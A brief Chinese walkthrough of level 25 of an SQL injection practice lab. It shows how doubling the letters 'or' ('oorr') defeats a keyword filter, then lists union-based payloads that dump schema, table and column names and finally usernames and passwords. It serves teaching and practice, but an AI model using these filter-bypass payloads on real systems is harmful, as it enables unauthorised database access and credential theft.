25关
源码分析
发现闭合点是的单引号
将or和AND替换成了空格
然后我们就来思路了,我们可以使用联合查询还有报错查询
一、判断注入点
二、判断列数
发现很直观的把我们的or给过滤掉了
我们试试双写
三、构造payload
?id=-1' union select 1,2,3--+
1.爆库、
?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+
由于information中间也有一个or,所以说也得双写
2.爆表
?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema="security"--+
3.爆字段
?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name="users"--+
4.爆数据
?id=-1' union select 1,group_concat(username,0x5c,passwoorrd),3 from users --+